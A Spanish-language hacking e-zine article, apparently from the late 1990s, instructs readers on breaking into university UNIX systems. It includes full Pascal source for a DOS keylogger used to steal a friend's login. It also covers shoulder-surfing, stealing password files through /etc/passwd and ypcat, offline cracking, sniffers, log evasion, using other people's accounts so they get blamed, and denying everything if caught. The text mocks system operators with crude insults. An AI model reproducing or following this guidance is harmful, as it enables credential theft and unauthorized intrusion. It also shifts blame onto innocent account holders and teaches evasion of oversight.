mayo 17

Hola a todos, este es mi primer escrito que hago sobre estos temas para esta revista, no se que tal me quedara, pero intentare que sea lo mejor posible. En este, mi primer articulo, voy a intentar hablar sobre el tantas veces hablado hacking bajo UNIX. Mi idea es sentar las bases y las pautas que debe tener un hacker normalucho (porque buenos hackers hay muy pocos y pertenecen a otra orbita), asi que si alguien espera encontrarse aqui un bug para “arreglar” la ultima version del SunOS, pues mejor que deje de leer inmediatamente.

Antes de seguir hay que decir que no es aprobable el borrar cosas, es mas provechoso el apropiarse de recursos que de otra forma no podrias poseer, por ejemplo, una cuenta de acceso a internet en una maquina menos saturada y mas rapida que la del alumano (por decir algo), o la posibilidad de pillar datos ajenos…. es decir, cosas que dentro de lo malo no causa daños a nadie.

De entrada hay que buscar el sitio adecuado para hackear, yo recomiendo siempre las universidades, digamos que son las mas adecuadas ya que si te pillan no te haran demasiado. Si estas hackeando por modem, pues o procuras enchufarte de alguna forma al telefono de tu vecino o como te cazen te meten un paquete que te acuerdas. Si estas hackeando en la empresa donde trabajas, pues hombre, puedes perder el puesto de trabajo, lo cual no es aconsejable de ningun modo. Con lo que quedan las universidades, en las cuales si te cazan pues te puedes hacer el loco, y eso siempre que seas universitario porque si no lo eres pues te hacen menos todavia, en cuyo caso basta con que salgas por patas.

Si eres universitario, lo mejor es que te pongas a hackear siempre en un ordenador lo suficientemente bien situado como para que si ves venir a alguno de los operadores o becarios te pueda dar tiempo a cerrar todas las sesiones (nunca dejes nada abierto) pulsa alt-x si estas en un pc, o si estas en un terminal dale a la tecla de cortar y luego ejecutas “close all”; una vez hecho eso, simplemente te haces el loco, lo niegas todo, dices que acababas de llegar y a vivir que son dos dias.

Si llegais al punto de que os cazan, teneis que saber una cosa y es que nunca tienen pruebas concluyentes contra vosotros, se limitan a acojonaros hasta que os declareis cumpables, si nunca os declarais culpables al final tendran que olvidarlo todo. La unica prueba realmente concluyente seria que alguien os viera directamente lo que estais haciendo, el resto de pruebas se basan en logs y en basura informatica que para que pudiera tener algo de validez tendria que estar compulsada notarialmente en el mismo momento que es recibida ya que si no esta compulsada notarialmente en ese mismo momento no es valida legalmente ya que no se sabe si ha sido modificada (con un simple editor de textos) o no.

El primer paso es, logicamente, buscar una cuenta de trabajo que no sea la tuya, y desde el primer momento usa la cuenta de otro, para que nunca te cojan haciendo cosas raras con tu cuenta. Lo mas normal es que lo que haces quede registrado en algun log (y no en todos los casos) y cuando miran el log buscando por cadenas que revelan instrucciones comprometidas pues te descubren; por esto hay que usar la cuenta de otro, si te descubren iran a por el propietario legitimo de la cuenta y a ti no te pasara nada. Tambien pueden estar utilizando monitores que dan la alarma cuando algun usuario hace cosas anormales o incluso hay UNIX que implementan sistemas de deteccion que avisan con un write a la consola de ciertas cosas como reiterados accesos erroneos a una cuenta y todo tipo de acciones que os podais imaginar y que solamente tienen que ser configuradas por el administrador de turno.

Para hacerte con la primera cuenta hay tres formas sencillas, a continuacion las enumero y doy una explicacion de cada una. Esto, naturalmente, que no tuvieras una ya, ya que si tienes una propia, siempre puedes robar el fichero de passwords e intentar algun John the Ripper o similares. El metodo de ponerse en el login y sabiendo una cuenta intentar acertar el password a pelo, no es recomendable, primero porque podria saltar algun aviso en la consola a cuenta de los intentos sucesivos fallidos, la segunda porque podrias dejar la cuenta bloqueada y la tercera es que es dificilisimo. Yo lo habre probado cosa de media docena de veces y acerte una vez, pero vaya, lo normal es que no aciertes, y el tema de las cuentas con password por defecto, creo que practicamente ya no existe.

1- metodo (mirada furtiva), pues simplemente te dedicas a mirar al teclado de la gente que entra en su cuenta. Siendo disimulado y teniendo en cuenta que hay gente que va a pulsacion por segundo, pues le cazaras el password sin problemas. Yo he conocido a autenticos especialistas en esta tecnica, sir in mas lejos, un amigo era capaz de cazarle el password a la primera a cualquier persona que teclee a menos de unas 200 pulsaciones por minuto; y se teclearas a la velocidad que sea te pillaba el password en un maximo de dos veces. Yo mismamente, metiendo un password de 8 caracteres en un segundo, me ligo el password a la segunda vez que me vio meterlo.

2- metodo (papelito revelador), pues eso, la gente es incapaz de recordar su password, y por eso lo apunta en algun papel, y suele ser que en un papel tengan los passwords de todas las maquinas a las que tienen acceso. Con lo que en el momento que lo sacan tienes unos instantes para memorizar el password. Luego es posible que tengan el mismo password en todas las maquinas a las qeu tienen acceso, ya no solo porque ellos se lo hayan puesto asi, sino porque el listo del administrador de turno asi lo ha dispuesto.

3- metodo (capturador de teclado), este es el que mas me gusta. Cojes y te vas a un ordenador (no vale terminal) y ejecutas la mierda de programa que te pongo a continuacion. Una vez ejecutado te pones a hacer el tonto hasta que viene el tipico julai que te dice “me dejas un momento entrar en mi cuenta para bajarme unos ficheros a disco”, vas tu y le dices “como no, para eso estamos los amigos, para ayudarnos entre nosotros” y pulsas F7, al hacer eso se vaciara el buffer y memorizara a partir de ese momento las primeras 512 pulsaciones. Cuando el julai en cuestion se va vas tu y pulsas F8, y en ese momento te apareceran las 512 teclas pulsadas y entre ellas el login y el password claro esta. Capturadores de teclado hay muchos, pero si quieres puedes usar el mio, que es facil, cortito y muy efectivo; aunque reconozco que los hay mas completos y mucho mejores que el mio.

————

uses dos;

{$M $800,0,0}

(* Grabador de teclado *) (* *) (* F7 -> Inicializa el buffer de teclado. *) (* F8 -> Muestra e incializa el buffer de teclado. *)

var KbdIntVec : Procedure; tab : array[1..512] of byte; n : integer;

procedure mostrar_autor; begin writeln; writeln(‘ Grabador de Teclado. ‘); writeln; writeln(‘ Autor: Lordman. 1 de Enero de 1996. ‘); writeln; end;

procedure inicializar; begin for n := 1 to 512 do tab[n] := 0; n := 0; end;

procedure mostrar; var car : char; tdec : string[53]; begin tdec := ‘ 1234567890 ! qwertyuiop + asdfghjkln – zxcvbnm,.- ‘; for n := 1 to 512 do begin if (tab[n] >= 1) and (tab[n] <= 57) then car := tdec[tab[n]] else car := ‘ ‘; write(car); end; inicializar; writeln; end;

{$F+} procedure Keyclick; interrupt; var aux : byte; begin aux := port[$60]; if aux < $80 then begin if n <= 512 then n := n + 1; tab[n] := aux; if aux = 66 then mostrar; if aux = 65 then inicializar; end; inline($9C); KbdIntVec; end; {$F-}

begin

mostrar_autor; inicializar; GetIntVec($9,@KbdIntVec); SetIntVec($9,Addr(Keyclick)); Keep(0);

end.

————

Cuando tengas ese password fijate a ver si son passwords de inicializacion. Me explico, ya he visto casos de cuentas que se creaban con passwords por defecto que seguian una tonica similar, por ejemplo, login: cuenta47, password: pass47, ?entendeis a lo que me refiero?.

Una vez que hayas conseguido la primera cuenta tienes que en distinto turno en el que el julai te haya pedido el favor. Es decir, por norma general la gente entras en sus cuentas en el turno de manana (de 9 a 2) o en el de tarde (de 3 a 8), con lo que tu tendras en cuenta ese detalle, date cuentas que si pillas con una maquina que no permita duplicidad de usuarios la puedes liar si el tio al entrar la maquina le dice que esta ya conectado.

Cuando entres la primera vez en la cuenta robada (y en cualquier otra que consigas) deberas utilizar el comando “last | grep <usuario>” cuyo comando te dara un listado de los ultimos accesos a esa cuenta, en cuyo listado podras ver a que horas se conecta el propietario de la cuenta y podras intentar evitar el coincidir con el.

Una vez entrado en la cuenta se recomienda hacer un doble login, es decir, 1 minuto despues de entrar ejecutas el comando “login” y vuelves a entrar para que al hacer un finger no aparezca puesto de acceso en donde estas. No es un sistema definitivo ya que te pueden cojer igualmente, pero por lo menos no lo pones tan facil. El esperar 1 minuto es para que en la lista de accesos no aparezcan los dos con una diferencia de pocos segundos y se deduzca que estas en el puesto de acceso desde donde se realizo la primera conexion. Insisto que no es un sistema definitivo, pero es algo, al menos si hacen un finger no aparecera el puesto de acceso desde donde os conectais. Aunque pueden usar las estadisticas de red y ahi sale todo, pero bueno, algo es algo.

Ten cuidado cuando uses la cuenta de trabajo para cosas provechosas. Disimula para que parezca que no estas haciendo nada malo, es decir, haz ftp’s a donde sea (maquinas locales si no hay acceso a internet), telnet’s, juega a algun juego que haya disponible, haz algun talk……. y en medio de todo eso pues ya sabes haz lo que de verdad te interese hacer. Mas que nada porque todas esas cosas que te he puesto anteriormente es lo que hace un usuario normal y claro, antetodo teneis que hacer ver que vosotros sois un usuario normal.

Otra cosa que esta bien hacer, es comprobar lo que hace la gente, para que si te estas rastreando tengas posibilidades de salirte a tiempo de la cuenta. Ejecutar el comando “w” y el “ps -u root” esta bien para ver lo que hace la gente y si ves que te referencian a ti, o a algun proceso que hayas estando haciendo, o a algun comando…. (todo ello anteponiendo, por parte del operador, el comando grep a veces) pues mal asunto, sal por patas que a lo mejor hay problemas. Una cosa tienes que recordar, no te preocupe no hackear el tiempo que a ti te hubiera gustado, piensa que manana habra mas tiempo, pero si te ligan a lo mejor manana no hay mas tiempo.

Llegado a este punto ya tienes una cuenta, lo primero que hay que hacer es intentar llevarte el fichero de passwords. Para esto hay fundamentalmente dos formas, la primera es un “cat /etc/passwd >passwd” aunque si la maquina tiene el fichero de passwords en shadow no te servira, en el caso de ficheros shadow y si la maquina es servidor de cuentas de otras maquinas (NIS) al ejecutar el comando “ypcat passwd

>passwd” recibiras una lista de todas las cuentas y sus passwords >sin

nada de shadow. Por ultimo estan algunas rutinas que sacan el fichero de passwords, yo personalmente nunca las he utilizado, aunque tambien es verdad que lo he intentado poco ya que o bien hackeaba contra sistemas UNIX sin shadow o bien con el truco de ypcat me bastaba. Si quereis buscar esas rutinas que os he comentado pues tirad de internet que hay mazo de ellas.

Una vez que has conseguido el fichero de passwords, te lo llevas a casa y alli utilizas los famosos crackeadores de cuentas UNIX como el John the Ripper, KillerCracker, Hades, BruteJack…. y intentas descubrir passwords desde tu casa y con la maxima discreccion que eso mismo conlleva. Con este sistema deberas conseguir bastantes cuentas para cubrirte las espaldas si pierdes alguna. Os puedo decir que en cierto servidor gratuito de email de mas de 13.500 cuentas logre petar casi 2.000, asi que os podeis hacer una idea de hasta donde se puede llegar. No os pongais a buscar servidores gratuitos de email porque le reporte al webmaster el error y ya esta solucionado. El error consistia en que podias hacer ftp con tu login y tu password para acceder al espacio dedicado a tu pagina web, una vez hecho eso te desviabas al subdirectorio donde estaba el fichero de password, lo cojias y como el sistema no tenia shadow pues asunto solucionado.

Luego deberas empezar a ejecutar maravillas como el Satan o el Cops y ver que pasa. No voy a explicar el funcionamiento de estos sistemas asi que a buscar el fichero y leeros el manual. En la misma maquina siempre podeis ejecutar el famoso “crack” el cual probara permutaciones de palabras y diccionarios hasta practicamente el infinito, este software nunca acaba, asi que no espereis a que acabe porque nunca lo hara. El problema es que si dejais un proceso de fondo estais sobrecargando demasiado la maquina y es posible que se den cuenta los administradores, aunque no necesariamente, un amigo mio ejecuto un proceso de esos sobre la cuenta root de una maquina de una facultad y tardaron 20 dias en descubrir el proceso. Naturalmente cuando lo descubrieron ni idea de quien fue y se limitaron a pararlo. Lo curioso es que la maquina mostraba un factor de carga altisimo y no se aparon del burro en 20 dias.

Llegado a este punto hay que empezar a buscar otras alternativas. De entrada y antes de seguir comentaros que os olvideis de bugs de sendmail, me puedo arriesgar a decir que no queda ninguna maquina que cuente con versiones del sendmail que casquen, bueno, si os encontrais con un bug descubierto este ano, pues vale, sirve, pero no intentes los infinitos bugs que aparecen porque lo llevais claro para que funcione uno. Alguna posibilidad teneis, pero se puede decir que si la version es una 8.x olvidaros de todo, si es una 7.x a lo mejor teneis algo por ahi y las unicas que petaban por todos los lados eran las 5.x. Daros cuenta que si hubiera una version petable del sendmail, fijo que ya la habrian petado antes que llegarais vosotros, con lo que si podeis mirar que version es por si tuvierais suerte pero no os obcequeis con probar bugs del senmail a ver si alguno funciona porque es dificil.

Si vais a hacer cosas peligrosas los mejores momentos son de 8 a 9 de la manana (los operadores estan llegando todavia o desayunando), de 2 a 4 de la tarde (estan comiendo como cerdos o cotilleando como marujas) y a partir de las 7 de la tarde (para esa hora se han ido a casa a decirles a sus mujeres lo buenos que han sido y lo bien que se han portado), aunque debereis verificar los horarios y ver cuales son los mas adecuados. Ni que decir que ni se os ocurra hacer nada por telefono, estais pillados y os pueden hacer un hijo de plastico.

Llegado este punto hay que plantearse la posibilidad de instalar un sniffer. Basicamente, hay tres posibles sniffers.

1- – Sniffer corriendo bajo MS-DOS. No es recomendable ya que la red novell lo detecta, no como sniffer, sino como que esta pasando algo raro en un puesto de acceso concreto.

2- – Sniffer desde cuenta UNIX, el mas usado, aunque no por ello el mas seguro. Hay utilidades UNIX que detectan si se esta ejecutando un sniffer en la maquina, aunque los operadores no suelen usar estas utilidades y en el peor caso te quedarias sin cuenta y procederias a usar otra, ya sabiendo que eso no lo puedes hacer. No obstante suelen detectar tambien estos procesos porque corren durante demasiado tiempo.

3- – Sniffer montado desde un Linux, el mas sofisticado y el que requiere algo de experiencia en Linux. La idea es muy sencilla, preparas un disco con una instalacion super-reducida del Linux, arrancas bajo MS-DOS y luego ejecutas el Linux. La instalacion del Linux debera ser en modo MS-DOS utilizando ficheros que se descomprimen en memoria gerando una unidad virtual. Esta sistema ademas te ofrecera la posibilidad de montar unidades de distintas maquinas, usando el famoso bug de la PC-NFS que consiste en que si quieres acceder a una cuenta que no sea la de root, no tienes mas que crear una cuenta con el mismo login (en tu maquina portable) y hacer un mount del subdirectorio. Ojo con dejar los demonios de entrada a la maquina, no vaya a ser que el operador haga un rastreo de ip’s y vuestra maquina responda. Me explico?, se instala in linux super-reducido en formato MS-DOS en un disquete, incluyendo una unidad RAM donde estan los pocos ejecutables que necesiteis.

Apartir de aqui, ya solo queda el sistema de empezar a probar bugs que hay en distintas direcciones de internet dedicadas a la materia. Para empezar estan bien las http://www.rootshell.com y http://www.hha.net; la de rootshell te permite hacer busquedas en base a palabras, lo cual te ofrece la posibilidad de introducirle el nombre del software UNIX que hay instalado y el buscador te mostrara lo que tiene. Creo que tambien, una de ellas, te permitia buscra por sistemas operativos, aunque eso ya no me acuerdo bien.

Un ultimo detalle que es obligado a la hora de dedicarse a esta tan noble arte es conocer al operador del sistema, si puedes hazte amigo de el, vete a tomar unas copas con el, incluso de vez en cuando que parezca que eres su amigo, es decir, utiliza la psicologica.

Hay varios tipos de operadores, tu futuro dependera del tipo con el que te tropiezes, mas o menos, se pueden resumir, segun mi experiencia, en cinco formatos de operador.

– El reprimido sexual, este es el peor, es como si su mujer le pegara y no hiciera el amor con el, lleva 7 anos sin follar y siente el orgasmo en base a buscar cabezas de turco, buscar culpables donde no los hay y demostrar su profesionalidad acusando a todo el que se le pone por delante para poder lavarse las manos y que antetodo siga intacta su imagen y prstigio internacional (por lo menos). Peligrosisimo y hay que tener mucho cuidado con el.

– El chuloputas, sin mas un chulo a nivel maximo. Continuamente esta demostrando su chuleria este donde este. Este es menos peligroso porque si te caza sin mas te humillara un poco y te dira que eres una mierda, pero al final posiblemente te dira que no lo vuelvas a hacer y es posible que lo olvide.

– El pasota. Sin mas el tipico que se limita a cobrar el sueldo a fin de mes y meterse en el minimo de lios posibles. Con este no tendras problemas ya que para que nadie dude de su profesionalidad si te caza lo arreglara contigo en privado, no te denunciara para no desvelar que le has hackeado el ordenador. Incluso es posible que a cuenta de eso se haga colega tuyo.

– El pelota. Pasa su vida haciendo la pelota a su superior mas proximo. Carece de personalidad alguna y es incapaz de pensar por si mismo. Si quieres saber con quien estas tratando deberas analizar a su superior y no a el.

– El subnormal. Pues eso, eimplemente, subnormal, no tiene ni idea de lo que hace, le han reciclado hace poco y no sabe ni por donde le da el aire, basicamente, sabe crear cuentas, cambias passwords y poco mas.

Puesta hasta aqui ha llegado mi primer articulo electronico. En el segundo voy a tratar el tema de que hacer si se tiene un password de root, aparentemente puede parecer absurdo lo que planteo pero vereis que no es tan absurdo y hay que tener en cuenta muchas cosas para poder usarlo, a no ser que el operador pase de todo o sea un inutil, claro esta.